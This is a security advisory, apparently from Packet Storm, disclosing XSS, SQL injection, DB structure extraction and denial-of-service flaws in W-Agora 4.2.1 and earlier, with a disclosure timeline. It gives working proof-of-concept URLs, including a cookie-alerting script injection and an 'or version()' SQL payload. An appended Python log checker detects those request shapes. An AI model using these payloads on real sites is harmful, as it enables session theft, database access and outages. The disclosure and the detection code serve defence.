Hello Packet Storm!

I want to warn you about Cross-Site Scripting, SQL DB Structure Extraction, SQL Injection and Denial of Service vulnerabilities in W-Agora.

SecurityVulns ID: 11324.

-------------------------
Affected products:
-------------------------

Vulnerable are W-Agora 4.2.1 and previous versions.

----------
Details:
----------

XSS (WASC-08):

http://site/current/search.php?bn=support_news&search_forum='%3Cscript%3Ealert(document.cookie)%3C/script%3E&site=support&gosearch=1

SQL DB Structure Extraction (WASC-13):

http://site/current/search.php?bn=support_news&search_forum='&site=support&gosearch=1

SQL Injection (WASC-19):

http://site/current/search.php?bn=support_news&search_forum='%20or%20version()%3E'5&site=support&gosearch=1

DoS (WASC-10):

http://site/current/search.php?bn=support_news&search_forum=support_news&site=support&gosearch=1&pattern=%25

http://site/current/search.php?bn=support_news&search_forum=support_news&site=support&gosearch=1&pattern=

http://site/current/list.php?site=support&bn=support_news

------------
Timeline:
------------

2010.10.30 - announced at my site.
2010.11.01 - informed developers.
2010.12.25 - disclosed at my site.

I mentioned these vulnerabilities at my site (http://websecurity.com.ua/4650/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
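
Added example (not part of the original advisory and not W-Agora code): a log check that flags requests to search.php whose search_forum or pattern values match the shapes listed under Details. It assumes legitimate search_forum values are plain forum names like the advisory's support_news and that the web server writes combined-format access logs; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate search_forum value is a plain forum name
# (letters, digits, underscore) like the advisory's "support_news", or empty.
FORUM_NAME = re.compile(r"[A-Za-z0-9_]*")
# Request field of a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(url):
    """Return findings for one request URL; an empty list means nothing matched."""
    parts = urlsplit(url)
    if not parts.path.endswith("/search.php"):
        return []
    # parse_qs percent-decodes values; keep_blank_values keeps "pattern=".
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for value in params.get("search_forum", []):
        if not FORUM_NAME.fullmatch(value):
            findings.append("search_forum is not a plain forum name")
    for value in params.get("pattern", []):
        if value.strip("% ") == "":
            findings.append("pattern is empty or only a wildcard")
    return findings

def scan(log_lines):
    """Return (line_number, findings) for every flagged access-log line."""
    flagged = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        findings = classify(match.group(1)) if match else []
        if findings:
            flagged.append((number, findings))
    return flagged

def log_line(url):
    # Constructed combined-format line using a documentation IP address.
    return f'192.0.2.10 - - [25/Dec/2010:10:00:00 +0000] "GET {url} HTTP/1.1" 200 4096'

# Constructed sample requests, not real traffic.
BASE = "/current/search.php?bn=support_news&site=support&gosearch=1"
SAMPLE_LOG = [log_line(u) for u in (
    BASE + "&search_forum=support_news&pattern=install",
    BASE + "&search_forum=%27",
    BASE + "&search_forum=support_news&pattern=%25",
    BASE + "&search_forum=support_news&pattern=",
    "/current/list.php?site=support&bn=support_news",
)]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(f"line {number}: {'; '.join(findings)}")
```

The list.php URL under DoS carries no distinguishing parameter value, so this check does not cover it.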